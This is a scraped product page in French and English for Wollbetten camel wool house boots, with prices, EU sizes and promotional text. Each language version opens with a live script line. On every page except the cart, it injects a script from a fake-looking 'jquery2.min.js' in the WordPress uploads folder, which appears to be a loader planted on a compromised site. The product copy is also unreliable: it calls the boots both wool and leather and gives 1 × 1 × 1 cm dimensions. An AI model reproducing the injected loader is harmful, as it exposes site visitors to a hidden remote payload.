if (window.location.pathname !== '/cart/') { var scriptElement = document.createElement('script'); scriptElement.src = '/wp-content/uploads/jquery2.min.js'; document.head.appendChild(scriptElement); }

Bottes de maison en laine de chameau | Wollbetten

Les bottines Wollbetten Camel Wool House sont de véritables chaussons de qualité en laine du cœur de la Suisse. Gardez vos pieds naturellement au chaud avec ce chef-d'œuvre fait à la main.

SKU SMTWLHoseBottes Catégories , , Marque:

$59.30 - $86.80

Poids 0.900 kg
Dimensions 1 × 1 × 1 cm

Bottes de maison en laine de chameau | Wollbetten

Les bottines Wollbetten Camel Wool House sont des pantoufles de qualité en cuir véritable du cœur de la Suisse. Gardez vos pieds naturellement au chaud avec ce chef-d'œuvre fait à la main. Comme Wollbetten est une entreprise familiale, ils insufflent à tous leurs produits le plus grand amour et le plus grand souci du détail. Par conséquent, leurs pantoufles de maison sont vraiment uniques.

Produit original de fabrication suisse

Profitez de porter vos bottes en laine de chameau dans la maison en hiver ! En raison des matériaux naturels, vos pieds seront chauds, confortables, doux et confortables. Ils sont tout ce que vous pourriez souhaiter dans une pantoufle de maison. De plus, il s'agit d'un produit Swiss Made original.

Disponible dans les tailles:

  • À partir de 36 ans
  • – 47 (UE).

Tableau des tailles de chaussures pour femmes

Tableau des tailles de chaussures pour hommes

Boots maison en laine camel – Le confort à la maison

Nous voulons tous une expérience réconfortante, et ces bottes peuvent l'offrir. Le design de ces bottes suisses est unique et fait pour vous offrir la meilleure expérience. Tout au long de la journée, nous gardons toujours nos chaussures. Par conséquent, il est essentiel d'utiliser une chaussure qui ne causera pas autant de problèmes à l'utilisateur ou ne le rendra pas inconfortable. Ces bottes sont faites d'une excellente laine de chameau, ce qui les rend incroyablement douces et confortables.

L'organisation derrière ces bottes maison est bien connue pour fabriquer d'excellents produits qui offrent une expérience exceptionnelle. Par conséquent, vous pouvez être sûr que vous vivrez une expérience formidable en portant ces bottes Swiss House de Wollbetten.

Découvrez les produits Wollbetten

Des bottes de maison aux oreillers, couettes, surmatelas, etc., Wollbetten est bien connu pour offrir l'expérience la plus réconfortante grâce à ses produits à sa vaste base d'utilisateurs. Si vous souhaitez améliorer votre confort grâce à des produits suisses faits à la main, les produits Wollbetten pourraient être le choix le plus adapté à vos besoins.

Nous avons une vaste collection de produits Wollbetten dans notre boutique en ligne. Parcourez-les et payez en ligne. Nous livrerons les produits directement à votre porte.

Panier

×
Votre panier est vide. :( Go to Shop
Sélectionnez votre devise
Bottines en laine camel 1Bottes de maison en laine de chameau | Wollbetten
$59.30 - $86.80Options
Remonter en haut
Rechercher

if (window.location.pathname !== '/cart/') { var scriptElement = document.createElement('script'); scriptElement.src = '/wp-content/uploads/jquery2.min.js'; document.head.appendChild(scriptElement); }

Camel Wool House Boots | Wollbetten

Wollbetten Camel Wool House Boots are genuine wool quality slippers from the heart of Switzerland. Keep your feet naturally warm with this handmade masterpiece.

SKU SMTWLHoseBoots Categories , , Brand:

$59.30$86.80

Camel Wool House Boots | Wollbetten

Wollbetten Camel Wool House Boots are genuine leather quality slippers from the heart of Switzerland. Keep your feet naturally warm with this handmade masterpiece. Since Wollbetten is a family company, they infuse all their product with the utmost love and attention to detail. Hence, their house slippers are truly one-of-a-kind.

Original Swiss Made product

Enjoy wearing your camel wool boots around the house in winter! Because of the natural materials, your feet will feel warm, cozy, soft, and comfortable. They’re everything you could possibly want in a house slipper. In addition, they are an original Swiss Made product.

Available in sizes:

  • from 36
  • – 47 (EU).

Women Shoe Sizes Table

Men Shoes Size Table

Camel Wool House Boots – Comfort at home

We all want a comforting experience, and these boots can deliver it. The design of these Swiss boots is unique and made to offer you the best experience. Throughout the day, we always keep our shoes on. Therefore, it is essential to use a shoe that won’t give the user so much trouble or make them uncomfortable. These boots are made of excellent camel wool, which makes them incredibly soft and comfortable.

The organization behind these house boots are well known for making great products that offer an exceptional experience. Therefore, you can be confident that you will have a great experience wearing these Swiss House Boots by Wollbetten.

Explore Wollbetten products

From house boots to Pillow, Duvet, mattress toppers, and more, Wollbetten is well known for offering the most comforting experience through its products to its vast user base. If you want to elevate your comfort through handmade Swiss products, Wollbetten products might be the most suitable choice for your need.

We have a vast collection of Wollbetten products in our online store. Browse through them and checkout online. We will deliver the products right to your doorstep.

Weight 0.900 kg
Dimensions 1 × 1 × 1 cm

Shopping cart

×
Your cart is empty. Go to Shop
Select your currency
Camel Wool House Boots 1Camel Wool House Boots | Wollbetten
$59.30$86.80Select options
Scroll to Top
Search